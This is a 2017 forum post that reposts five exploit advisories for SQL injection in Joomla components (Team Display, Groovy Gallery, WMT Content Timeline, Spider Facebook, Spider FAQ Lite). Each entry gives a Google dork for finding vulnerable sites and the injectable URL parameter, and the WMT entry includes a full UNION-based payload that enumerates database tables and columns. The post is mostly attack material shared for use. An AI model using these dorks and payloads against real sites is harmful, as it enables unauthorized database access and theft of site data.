Massaro Posted February 18, 2017 Report Posted February 18, 2017 Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection # # # # # # Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection # Google Dork: inurl:index.php?option=com_teamdisplay # Date: 17.02.2017 # Vendor Homepage: http://addonstreet.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/ # Demo: http://addonstreet.com/demo/teamdisplay/ # Version: 1.2.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL] # # # # # Joomla! Component Groovy Gallery 1.0.0 - SQL Injection # # # # # # Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection # Google Dork: inurl:index.php?option=com_groovygallery # Date: 17.02.2017 # Vendor Homepage: http://addonstreet.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/ # Demo: http://addonstreet.com/products/groovy-gallery # Version: 1.0.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL] # http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL] # # # # # Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection # # # # # # Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection # Google Dork: inurl:index.php?option=com_wmt_content_timeline # Date: 17.02.2017 # Vendor Homepage: http://devecostudio.com # Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/ # Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL] # -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+- # # # # # Joomla! Component Spider Facebook 1.6.1 - SQL Injection # # # # # # Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection # Google Dork: inurl:index.php?option=com_spiderfacebook # Date: 16.02.2017 # Vendor Homepage: http://web-dorado.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/ # Demo: http://demo.web-dorado.com/spider-facebook.html # Version: 1.6.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL] # # # # # Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection # # # # # # Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection # Google Dork: inurl:index.php?option=com_spiderfaq # Date: 16.02.2017 # Vendor Homepage: http://web-dorado.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/ # Demo: http://demo.web-dorado.com/spider-faq.html # Version: 1.3.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL] # # # # # Sursele le aveti deasupra. 1 Quote